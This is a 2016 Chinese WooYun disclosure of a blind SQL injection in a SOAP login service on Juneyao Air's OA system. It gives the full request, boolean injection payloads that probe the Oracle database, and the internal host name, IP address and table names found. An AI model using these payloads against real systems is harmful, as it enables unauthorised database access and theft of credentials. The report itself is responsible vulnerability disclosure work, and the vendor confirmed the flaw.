当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0213615

漏洞标题:航空安全之吉祥航空某系统web service注入漏洞

相关厂商:juneyaoair.com

漏洞作者: harbour_bin

提交时间:2016-05-27 23:09

修复时间:2016-07-14 08:50

公开时间:2016-07-14 08:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-05-27: 细节已通知厂商并且等待厂商处理中
2016-05-30: 厂商已经确认,细节仅向厂商公开
2016-06-09: 细节向核心白帽子及相关领域专家公开
2016-06-19: 细节向普通白帽子公开
2016-06-29: 细节向实习白帽子公开
2016-07-14: 细节向公众公开

简要描述:

RT

详细说明:

#1 http://oa.juneyaoair.com//services/

1-1.png


#2 注入位置

POST http://oa.juneyaoair.com//services/MobileService HTTP/1.0
SOAPAction: ""
Content-Type: text/xml
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"  xmlns:xsd="http://www.w3.org/1999/XMLSchema"  xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"  xmlns:m0="http://tempuri.org/"  xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/">
     <SOAP-ENV:Header/>
     <SOAP-ENV:Body>
        <checkUserLogin xmlns="webservices.services.weaver.com.cn">
           <in0>1' or '1'='1</in0>
           <in1>1</in1>
           <in2>1</in2>
        </checkUserLogin>
     </SOAP-ENV:Body>
</SOAP-ENV:Envelope>


1' or '1'='1 结果为5
1' or '1'='2 结果为4
#3 本地通过C#编写代码, 进行中转注入

1-2.png


#4 数据证明
POC:

1' or (select sys_context('userenv','isdba') from dual)='FALSE' and '1'='1 True
1' or (select sys_context('userenv','current_user') from dual)='OA' and '1'='1 TRUE
1' or (select sys_context('userenv','db_name') from dual)='oanew' and '1'='1 TRUE
1' or (select count(distinct(owner)) from sys.all_tables)=9 and '1'='1 TRUE


用户名:OA
当前数据库: oanew
主机名: OA1-SRV
主机IP:172.20.21.41
数据库版本: Oracle Database 11g Enterprise Edition Release 11.2.0.1.0 - 64bit Production


数据库

1-3.png


OA数据库共有2008个表
POC:

1' or (select count(*) from sys.all_tables where owner='OA')=2008 and '1'='1


仅列出部分表

HPELEMENTSETTING----2016/5/26 14:48:15
WORKFLOW_FORWARD----2016/5/26 14:48:18
DOCCDANGEWFFIELD----2016/5/26 14:48:20
DOCCHANGESETTING----2016/5/26 14:48:27
PAGENEWSTEMPLATE----2016/5/26 14:48:28
DOCCHANGERECEIVE----2016/5/26 14:48:31
WORKTASK_MONITOR----2016/5/26 14:48:32
WORKTASKSHARESET----2016/5/26 14:48:32
WORKTASK_CODESET----2016/5/26 14:48:36
WORKTASK_BACKLOG----2016/5/26 14:48:37
WORKTASK_CODESEQ----2016/5/26 14:48:48
VORKFLOW_DEPTABBR----2016/5/26 14:48:54
WORKTASK_OPERATOR----2016/5/26 14:49:21
CPTCAPITALCODESEQ----2016/5/26 14:49:24
WORKTASK_TASKLIST----2016/5/26 14:49:25
DOCCHANGEWORKFLOW----2016/5/26 14:49:26
BILL_BOHAIEVECTION----2016/5/26 14:50:06
DOCSUBCATFTPCONFIG----2016/5/26 14:50:10
WORKFLOWXFIELDYEAR----2016/5/26 14:50:12
WORKTASK_FIELDDICT----2016/5/26 14:50:12
DOCSECCATFTPCONFIG----2016/5/26 14:50:18
DOCCHANGERECEIVEWF----2016/5/26 14:50:23
DOCHANDWRITTENCOLOR----2016/5/26 14:50:41
XMLREPORT_SHAREINFO----2016/5/26 14:50:45
CPTSEARCHDEFINITION----2016/5/26 14:50:49
FAVOURITELASTACTIVE----2016/5/26 14:50:54
DOCMAINCATFTPCONFIG----2016/5/26 14:50:57
CPTCAPITALEQUIPMENT----2016/5/26 14:50:57
DOCCHANGESENDDETAIL----2016/5/26 14:50:57
WORKTASK_COD@DETAIL----2016/5/26 14:51:03
WORKFLOW_CREATETASK----2016/5/26 14:51:06
WORKFLOW_SUBCOMABBR----2016/5/26 14:51:08
WORKTASKCREATESHARE----2016/5/26 14:51:08
WORKTASK_TASKFIELD----2016/5/26 14:51:18
WORKTASK_REQUESTLOG----2016/5/26 14:51:18
WORKTASK_SELECTITEM----2016/5/26 14:51:21
OFID----2016/5/26 14:51:22
WORKFLOW_DEPTABBRDEF----2016/5/26 14:51:31
DOCHANDWRITTENDETAIL----2016/5/26 14:51:32
OUTERDATAWFSETDETAIL----2016/5/26 14:51:46
OUTERDATAWFPERIODSET----2016/5/26 14:51:46
OFUSER----2016/5/26 14:51:47
WORKFLOW_TRACKDETAIL----2016/5/26 14:51:49
WORKTASK_REQUESPBASE----2016/5/26 14:52:11
WORKDLOW_SPECIALFIELD----2016/5/26 14:52:56
MAILSIGN----2016/5/26 14:52:57
OFVCARD----2016/5/26 14:53:02
OFGRLUP----2016/5/26 14:53:12
HRMORGGROUP----2016/5/26 14:53:36
OFROSTER----2016/5/26 14:53:43
WORKFLOW_SUBCOMABBRDEF----2016/5/26 14:53:49
WORKFLOW_SUPSUBCOMABBR----2016/5/26 14:53:56
SYSFAVOURITE_FAVOURITE----2016/5/26 14:53:56
PAGENEWSTEMP@ATELAYOUT----2016/5/26 14:54:00
WORKFLOW_CODESEQRECORD----2016/5/26 14:54:03
OFPRIVATE----2016/5/26 14:54:31
...


跑的太慢了, 不继续跑了, 后续可获得大量数据, OA系统的用户名、密码等...

漏洞证明:

已证明!

修复方案:

没什么用的东西, 就删掉吧

版权声明:转载请注明来源 harbour_bin@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-05-30 08:43

厂商回复:

漏洞确认,谢谢

最新状态:

暂无